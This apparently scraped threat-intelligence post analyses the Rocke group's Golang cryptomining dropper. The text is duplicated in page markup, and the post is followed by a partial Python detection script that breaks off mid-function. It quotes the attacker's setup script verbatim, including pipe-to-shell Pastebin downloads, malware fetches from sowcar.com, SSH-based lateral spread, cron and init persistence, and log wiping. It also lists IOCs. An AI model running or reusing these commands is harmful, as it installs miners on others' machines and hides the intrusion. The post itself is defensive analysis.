</pre><p>In this campaign, the threat actor also uses “init” and “systemd” services for persistence. 
The name of the service is “netdns”. Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the service called netdns. After the file is created, its access and modification times are changed before the file is marked as non-modifiable. The same technique is used by the new malware written in Go.</p><pre>
curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https://master.minerxmr.ru/Pep/4 -O /etc/init.d/netdns) &amp;&amp; chmod 777 /etc/init.d/netdns &amp;&amp; touch -acmr /bin/sh /etc/init.d/netdns &amp;&amp; chattr +i /etc/init.d/netdns
</pre><p>The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both the previous and the ongoing campaign assumes that it has root-level access on the machine. Below are code snippets from the current campaign and from the campaign reported by Unit 42, in which the threat actor uses SSH keys and known hosts, if available, to infect other machines.</p><p><strong>Last campaign</strong></p><pre>
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh' &amp;
    done
fi
</pre><p><strong>Current campaign</strong></p><pre>
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp;
    done
fi
</pre><p>In addition to the propagation over SSH, the new malware tries to compromise Redis servers, just like the Python-based malware.</p><p>There is also overlap of 
infrastructure. The email address used to register the sowcar[.]com domain also registered thyrsi[.]com, a domain that was reported on and linked to the same threat group in a report by Cisco Talos in December 2018. The domains registered by this email address are shown in the figure below.</p><p style="text-align: center;"><em><img alt="Domains registered by the same email address" src="https://cdn.filestackcontent.com/Oc8r9TtSyeKfqURLxYoO"/><br/> Figure 4: Domains registered by the same email address.</em></p><h2>Conclusion</h2><p>Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has switched from Python-based malware to malware written in Golang. Detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risk of being detected.</p><h2>Mitre ATT&amp;CK</h2><ul><li>T1190 Exploit Public-Facing Application</li><li>T1078 Valid Accounts</li><li>T1168 Local Job Scheduling</li><li>T1110 Brute Force</li><li>T1222 File Permissions Modification</li><li>T1021 Remote Services</li><li>T1064 Scripting</li><li>T1045 Software Packing</li><li>T1071 Standard Application Layer Protocol</li><li>T1099 Timestomp</li><li>T1055 Process Injection</li><li>T1036 Masquerading</li></ul><h2>IOCs</h2><p><strong>URLs</strong></p><pre>
https://pastebin[.]com/raw/yPRSa0ki
https://pastebin[.]com/raw/wDBa7jCQ
https://pastebin[.]com/raw/D8E71JBJ
https://pastebin[.]com/raw/HWBVXK6H
https://pastebin[.]com/raw/qs3ger9z
http://sowcar[.]com/t6/678/1552060180x1822611359.jpg
http://sowcar[.]com/t6/678/1552060225x1822611359.jpg
http://sowcar[.]com/t6/682/1552580197x2890211702.jpg
</pre><p><strong>SHA256</strong></p><pre>
029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd
93efdee9def596b93517699958e7a5c3f0bae88e220cb08593c4712f143696dd
3a4391293d1a7fbd5cfc34258aa0cfcd57abb8b4453e47ea293c572fbf1862ad
60aadabd2f3f1465f239d2721a663f4b9f9d15e739dcb14df64e241c2d37e30c
9df3ae6da6b262f5dea6a1f5438127cd4cfa8d718997b4e90b107fabb2b392be
e2db2dca7d84098192c5562c299a76330ca556ac30d583ac8079fe63b61e94d5
</pre><p><strong>Mining pool</strong></p><p>134.209.104.20:51640</p><h2>Endnotes</h2><ol><li>David Liebenberg, “<a href="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" target="_blank">Rocke: The Champion of Monero Miners</a>,” Talos Blog, published August 30, 2018, accessed March 14, 2019.</li><li>Xingyu Jin and Claud Xiao, “<a href="https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" target="_blank">Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security Products</a>,” Palo Alto Networks, published January 17, 2019, accessed March 14, 2019.</li><li>David Liebenberg and Andrew Williams, “<a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" target="_blank">Connecting the dots between recently active cryptominers</a>,” Talos Blog, published December 18, 2018, accessed March 14, 2019.</li></ol></div><div wb-element="parsed-html-container" class="text-rich-text"></div></div><div class="html_parsing_code w-embed w-script"><script>
// Get the text string to be parsed as HTML
const textElement = document.querySelector('[wb-element="text-data"]');
if (textElement) {
  const textString = textElement.textContent;
  // Create a temporary element to hold the parsed HTML
  const tempElement = document.createElement('div');
  tempElement.innerHTML = textString;
  // Get the parsed HTML content
  const parsedHTML = tempElement;
  // Append the parsed HTML to the container element
  const container = document.querySelector('[wb-element="parsed-html-container"]');
  if (container) {
    container.appendChild(parsedHTML);
  } else {
    console.error('Container element not found.');
  }
} else {
  console.error('Text element not found.');
}
</script></div></div></div></div></div><div class="padding-section-xsmall"><div 
class="max-width-small align-center"></div></div></div></div></div></section></div></main></div><!-- Schema --> <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "BlogPosting", "headline": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang", // Title "image": "https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp", // Featured Image "mainEntityOfPage": { "@type": "WebPage", "@id": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" // Slug }, "publisher": { "@type": "Organization", "name": "Anomali Inc.", "email": "mailto:info@anomali.com", // Corrected email format "address": { 
"@type": "PostalAddress", // Added PostalAddress type "streetAddress": "808 Winslow Street", // Split address into components "addressLocality": "California", "addressRegion": "United States", "postalCode": "94063", "addressCountry": "US" }, "logo": { "@type": "ImageObject", "url": "https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6629c9094ced776895005c80_Anomali-Logo-Full-Color-2024-1200.webp" } }, "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", // Corrected absolute URL for consistency "datePublished": "May 17, 2024", // Published On "dateCreated": "Jun 17, 2023", // Created On "dateModified": "Oct 04, 2023", // Updated On "description": "The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles.", // Meta Description "author": { "@type": "Person", "name": "Anomali Threat Research" // Author }, "alternativeHeadline": "Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs", // Meta Title "articleBody": "<h2>Summary</h2><p>The “Rocke group”, a Chinese threat actor group that specializes in cryptojacking, has shifted gears on how they’re stealing your cycles. Rocke is actively updating and pushing a new dropper that uses Pastebin for Command and Control (C2). Updates to the C2 as recent as March 13th, 2019 have been seen, which leads researchers to believe this campaign is ongoing. According to VirusTotal, detection of the new dropper is nearly non-existent. The group has been observed in previous campaigns to use the “ld.so.preload” mechanism to hook libc functions. The hooking hides the dropper and the mining software installed by the malware and prevents them from showing up in the “currently running” process list. This tactic is also used by the group in this new campaign. 
The miner uses a private mining pool hosted on DigitalOcean, which is a change from the threat actor’s previous tactics.</p><h2>Introduction</h2><p>The threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which the group utilized malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On March 12th, 2019, Anomali Research identified, with high confidence, a new active campaign that we believe is being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner onto a machine to mine Monero cryptocurrency. The Tactics, Techniques, and Procedures (TTPs) of this ongoing campaign overlap extensively with those in the report published by Unit 42.</p><p>This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. Detection of the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT; only one engine successfully detected it as malicious. The low detection rate of the malware, coupled with the techniques that keep the Rocke processes out of the running-process list on victim machines, raises the possibility that this campaign has been running successfully for weeks.</p><p style="text-align: center;"><em><img alt="Scanning results from VirusTotal for one of the malware samples" src="https://cdn.filestackcontent.com/iytoepbhR2ywK2oGKU1Q"/><br/> Figure 1: Scanning results from VirusTotal for one of the malware samples.</em></p><h2>Technical Details</h2><h3>Analysis of the Dropper</h3><p>The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. 
Instead of the “UPX!” string, the header carries “LSD!”. Repairing the header is needed before the samples can be unpacked with the unpacker provided by the UPX team.</p><p>The dropper is written in Go (Golang); the estimated source code structure, based on the decompiler output, is shown below:</p><pre>
Package main: /root/go/src/github.com/hippies/LSD
File: main.go
    goatt                Lines: 12 to 17 (5)
    main                 Lines: 17 to 34 (17)
/root/go/src/github.com/hippies/LSD/LSDB
File: a.go
    _kBytes              Lines: 13 to 27 (14)
    KWR                  Lines: 27 to 36 (9)
File: b.go
    _libBytes            Lines: 10 to 17 (7)
    LibWrite             Lines: 17 to 25 (8)
File: c.go
    _netdnsinitBytes     Lines: 11 to 18 (7)
    _netdnsserviceBytes  Lines: 18 to 26 (8)
    NetdnsWrite          Lines: 26 to 37 (11)
/root/go/src/github.com/hippies/LSD/LSDA
File: a.go
    getiplista           Lines: 12 to 37 (25)
    run                  Lines: 37 to 86 (49)
    runtwo               Lines: 86 to 98 (12)
    Ago                  Lines: 98 to 108 (10)
    (Ago)func1           Lines: 103 to 106 (3)
File: b.go
    getiplistb           Lines: 18 to 42 (24)
    generateTask         Lines: 42 to 54 (12)
    cmd                  Lines: 54 to 81 (27)
    (cmd)func1           Lines: 62 to 98 (36)
    cmdtwo               Lines: 81 to 93 (12)
    bgo                  Lines: 93 to 113 (20)
    (bgo)func1           Lines: 98 to 101 (3)
    Bbgo                 Lines: 113 to 118 (5)
/root/go/src/github.com/hippies/LSD/LSDC
File: a.go
    Read                 Lines: 17 to 43 (26)
    PathExists           Lines: 43 to 54 (11)
    CopyFile             Lines: 54 to 65 (11)
    Mkdir                Lines: 65 to 69 (4)
    Writefile            Lines: 69 to 79 (10)
    Writefiletwo         Lines: 79 to 88 (9)
    Delfile              Lines: 88 to 97 (9)
    Changetime           Lines: 97 to 105 (8)
    Cmdexec              Lines: 105 to 111 (6)
    Checkupdate          Lines: 111 to 129 (18)
    Getip                Lines: 129 to 149 (20)
    Getipb               Lines: 149 to 164 (15)
    Cron                 Lines: 164 to 173 (9)
</pre><p>The main execution process can be summarized in the following steps:</p><ol><li>Deletes “/etc/ld.so.preload” if it exists</li><li>Gets its own PID and writes it to “/tmp/.lsdpid”</li><li>Uses “chattr -i” to mark the PID file protected so it cannot be modified</li><li>Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”</li><li>Turns the modification timestamp on the copied file back 416 days</li><li>Installs an “init.d” startup script at “/etc/init.d/netdns” and a systemd service unit at “/usr/lib/systemd/system/netdns.service”; the modification times of these files are changed in the same way</li><li>Enables the service on the compromised system by executing “chkconfig --add netdns” and “systemctl enable netdns”</li><li>Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”</li><li>Writes C source code to “/usr/local/lib/libcset.c”</li><li>Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”</li><li>If GCC is not installed, tries to install it with “yum -y install gcc -y||apt-get -y install gcc” and recompiles</li><li>Adds the path of the shared object to “/etc/ld.so.preload” and protects the file from modification</li><li>Adds persistence through cron by executing echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - and by adding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh” to “/var/spool/cron/crontabs/root”</li><li>Checks for updates by reading the version listed at “https://pastebin.com/raw/HWBVXK6H”</li><li>Installs the Monero miner at “/tmp/kintegrityds” and protects it</li><li>The miner connects to a private pool hosted on DigitalOcean at IP and port 134.209.104.20:51640</li></ol><p>The malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to determine the machine’s external IP address so that it does not attack itself.</p><h3>Command and Control</h3><p>The malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is used to check for the latest version of the malware. If a new version is available, the malware reaches out to “https://pastebin[.]com/yPRSa0ki”. 
The paste shown below serves as a redirect to the actual setup script.</p><pre> (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's/ //'|sh</pre><p>The setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the threat actors’ malware instead. It also tries to use the known SSH hosts and the SSH key on the machine to spread laterally.</p><pre>
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -
mkdir -p /tmp
chmod 1777 /tmp
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdog"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdogs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ksoftirqds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v kintegrityds|awk '{if($3&gt;=80.0) print $2}'|xargs kill -9
yum -y install coreutils||apt-get -y install coreutils
apt-get install cron -y||yum install crontabs -y||apk add cron -y
if [ ! -f "/tmp/.lsdpid" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    else
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    fi
    nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp;
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    else
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    fi
    nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp;
fi
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp;
    done
fi
echo 0&gt;/var/spool/mail/root
echo 0&gt;/var/log/wtmp
echo 0&gt;/var/log/secure
echo 0&gt;/var/log/cron
#
</pre><p>The Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were added on February 24th, 2019.</p><p style="text-align: center;"><em><img alt="Pastebin profile used by the threat actor" src="https://cdn.filestackcontent.com/ujNmkh1WSJqf7vICOCGn"/><br/> Figure 2: Pastebin profile used by the threat actor</em></p><p>The server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below. 
The page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.</p><p style="text-align: center;"><em><img alt="Image hosting site from which the malware is downloaded" src="https://cdn.filestackcontent.com/DvfNdcNyRlGMU0MbeUCU"/><br/> Figure 3: Image hosting site from which the malware is downloaded.</em></p><p>According to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It was also registered by the same email address (4592248@gmail[.]com) as another domain that was used in an earlier Rocke campaign, which indicates that the site is likely controlled by the threat group.[3]</p><pre>
Domain Name: SOWCAR.COM
Registry Domain ID: 2277522871_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ename.com
Registrar URL: http://www.ename.net
Updated Date: 2019-03-08T01:38:36Z
Creation Date: 2018-06-21T11:14:39Z
Registry Expiry Date: 2019-06-21T11:14:39Z
Registrar: eName Technology Co., Ltd.
Registrar IANA ID: 1331
Registrar Abuse Contact Email: abuse@ename.com
Registrar Abuse Contact Phone: 86.4000044400
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DALE.NS.CLOUDFLARE.COM
Name Server: JOAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form:
Registry Registrant ID:Not Available From Registry
Registrant Name: LuWei
Registrant Organization: Lu Wei
Registrant Street: SiChuan ZhongLu 668 Hao 8 Lou
Registrant City: ShangHai
Registrant State/Province: ShangHai
Registrant Postal Code: 200000
Registrant Country: CN
Registrant Phone: +86.2139003725
Registrant Phone Ext:
Registrant Fax: +86.2139003725
Registrant Fax Ext:
Registrant Email: 4592248@gmail.com
Registry Admin ID:Not Available From Registry
</pre><h2>Overlapping TTPs with previous campaigns</h2><p>The current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both campaigns, the group uses Pastebin for C2, and the C2 system depends on three public pastes: one serves the latest version, one acts as a redirect, and the third is used to initialize the infection. The redirect uses either “cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh” after some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a similar pattern. In this campaign the username is “SYSTEMTEN”, while the username in the last campaign was “SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.</p><p>The filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to download the payload in this campaign and in the campaign reported by Unit 42. The filenames have the same structure, with some of the numbers overlapping.</p><pre>
http://sowcar.com/t6/678/1552060180x1822611359.jpg
https://master.minerxmr.ru/2/1551434778x2728329032.jpg
</pre><p>The malware uses cron for persistence. The similar crontab entries are shown below. The only difference between the entries is the ID of the paste used.</p><p>Cron jobs created by the Python version of the malware:</p><pre>
"*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"
"*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"
</pre><p>Cron jobs created by the Go version of the malware:</p><pre>
*/10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##
</pre><p>In this campaign, the threat actor also uses “init” and “systemd” services for persistence. 
The name of the service is “netdns.” Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the service called netdns. After the file is created, its access and modification times are changed before the file is marked immutable. The same technique is used by the new malware written in Go.</p><pre> curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https://master.minerxmr.ru/Pep/4 -O /etc/init.d/netdns) &amp;&amp; chmod 777 /etc/init.d/netdns &amp;&amp; touch -acmr /bin/sh /etc/init.d/netdns &amp;&amp; chattr +i /etc/init.d/netdns</pre><p>The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both the previous and the ongoing campaign assumes that it has root-level access on the machine. Below are code snippets from the current campaign and from the campaign reported by Unit 42, where the threat actor uses SSH keys and known hosts, if available, to infect other machines.</p><p><strong>Last campaign</strong></p><pre>
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh' &amp;
    done
fi
</pre><p><strong>Current campaign</strong></p><pre>
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp;
    done
fi
</pre><p>In addition to the propagation over SSH, the new malware also tries to compromise Redis servers, just like the Python-based malware.</p><p>There is also overlap of 
infrastructure. The email address used to register the sowcar[.]com domain also registered thyrsi[.]com. That domain was reported on and linked to the same threat group in a report by Cisco Talos in December 2018. The domains registered by this email address are shown in the figure below.</p><p style="text-align: center;"><em><img alt="Domains registered by the same email address" src="https://cdn.filestackcontent.com/Oc8r9TtSyeKfqURLxYoO"/><br/> Figure 4: Domains registered by the same email address.</em></p><h2>Conclusion</h2><p>Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from Python-based malware to malware written in Golang. Detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risk of being detected.</p><h2>MITRE ATT&amp;CK</h2><ul><li>T1190 Exploit Public-Facing Application</li><li>T1078 Valid Accounts</li><li>T1168 Local Job Scheduling</li><li>T1110 Brute Force</li><li>T1222 File Permissions Modification</li><li>T1021 Remote Services</li><li>T1064 Scripting</li><li>T1045 Software Packing</li><li>T1071 Standard Application Layer Protocol</li><li>T1099 Timestomp</li><li>T1055 Process Injection</li><li>T1036 Masquerading</li></ul><h2>IOCs</h2><p><strong>URLs</strong></p><pre>
https://pastebin[.]com/raw/yPRSa0ki
https://pastebin[.]com/raw/wDBa7jCQ
https://pastebin[.]com/raw/D8E71JBJ
https://pastebin[.]com/raw/HWBVXK6H
https://pastebin[.]com/raw/qs3ger9z
http://sowcar[.]com/t6/678/1552060180x1822611359.jpg
http://sowcar[.]com/t6/678/1552060225x1822611359.jpg
http://sowcar[.]com/t6/682/1552580197x2890211702.jpg
</pre><p><strong>SHA256</strong></p><pre>
029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd
93efdee9def596b93517699958e7a5c3f0bae88e220cb08593c4712f143696dd
3a4391293d1a7fbd5cfc34258aa0cfcd57abb8b4453e47ea293c572fbf1862ad
60aadabd2f3f1465f239d2721a663f4b9f9d15e739dcb14df64e241c2d37e30c
9df3ae6da6b262f5dea6a1f5438127cd4cfa8d718997b4e90b107fabb2b392be
e2db2dca7d84098192c5562c299a76330ca556ac30d583ac8079fe63b61e94d5
</pre><p><strong>Mining pool</strong></p><p>134.209.104.20:51640</p><h2>Endnotes</h2><ol><li>David Liebenberg, “<a href="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" target="_blank">Rocke: The Champion of Monero Miners</a>,” Talos Blog, accessed March 14, 2019, published August 30, 2018.</li><li>Xingyu Jin and Claud Xiao, “<a href="https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" target="_blank">Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security Products</a>,” Palo Alto Networks, accessed March 14, 2019, published January 17, 2019.</li><li>David Liebenberg and Andrew Williams, “<a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" target="_blank">Connecting the dots between recently active cryptominers</a>,” Talos Blog, accessed March 14, 2019, published December 18, 2018.</li></ol>", // Body Content (HTML Markup) "editor": { "@type": "Person", "name": "" // Author #2 (optional) }, "thumbnailUrl": "", // Open Graph Image "commentCount": 0 // Changed to a number type } </script></body></html>
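Host-side triage for the dropper artifacts listed under "Analysis of the Dropper" and the cron, service and ld.so.preload persistence discussed under "Overlapping TTPs", as an added example that is not part of the Anomali post and not the group's code. It runs over a snapshot of host state constructed inline (the HostSnapshot class, its field layout and the 365-day timestomp cutoff are assumptions of this example), so it runs offline; on a live host the same checks would read /etc/ld.so.preload, root's crontab, the listed paths and their stat() times. The timestomp check relies on the fact that touch and utime can move a file's mtime but not its ctime, so a file whose mtime is more than a year older than its ctime is what the post's "416 days" step produces.

```python
"""Host-side triage for the Rocke Go-dropper artifacts described in the post.

Added example, not code from the post or from the malware. It works on a
snapshot of host state built inline (HostSnapshot, its field layout and the
timestomp threshold are assumptions of this example) so it runs offline.
"""
import re
from dataclasses import dataclass, field

# Indicators taken from the post: paths the dropper writes, the paste IDs used
# for C2, and the private mining pool endpoint.
DROPPER_PATHS = {
    "/usr/sbin/kthrotlds", "/tmp/kthrotlds", "/tmp/kintegrityds", "/tmp/.lsdpid",
    "/usr/local/lib/libcset.c", "/usr/local/lib/libcset.so",
    "/etc/init.d/netdns", "/usr/lib/systemd/system/netdns.service",
}
PASTE_IDS = {"yPRSa0ki", "wDBa7jCQ", "D8E71JBJ", "HWBVXK6H", "qs3ger9z"}
POOL = "134.209.104.20:51640"
PASTE_RE = re.compile(r"pastebin\.com/raw/([A-Za-z0-9]{8})")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash)\b")
# The dropper pushes mtime back 416 days; touch/utime cannot move ctime, so a
# large ctime - mtime gap on a recently created file is the tell (assumed cutoff).
TIMESTOMP_DAYS = 365


@dataclass
class HostSnapshot:
    files: dict                                      # path -> content, present paths only
    crontab: list                                    # lines of root's crontab
    times: dict = field(default_factory=dict)        # path -> (mtime, ctime) epoch seconds
    connections: list = field(default_factory=list)  # remote "ip:port" endpoints


def preload_findings(snap):
    """Any /etc/ld.so.preload entry deserves review; libcset.so is the dropper's hook."""
    out = []
    for line in snap.files.get("/etc/ld.so.preload", "").splitlines():
        line = line.strip()
        if line:
            sev = "high" if line.endswith("/libcset.so") else "medium"
            out.append((sev, f"ld.so.preload entry: {line}"))
    return out


def cron_findings(snap):
    """Flag crontab lines that pipe a Pastebin raw paste into a shell."""
    out = []
    for line in snap.crontab:
        m = PASTE_RE.search(line)
        if m and PIPE_TO_SHELL_RE.search(line):
            sev = "high" if m.group(1) in PASTE_IDS else "medium"
            out.append((sev, f"cron fetches paste {m.group(1)} into a shell"))
    return out


def artifact_findings(snap):
    """Known dropper paths, timestomped files and the mining-pool connection."""
    out = [("high", f"dropper artifact present: {p}")
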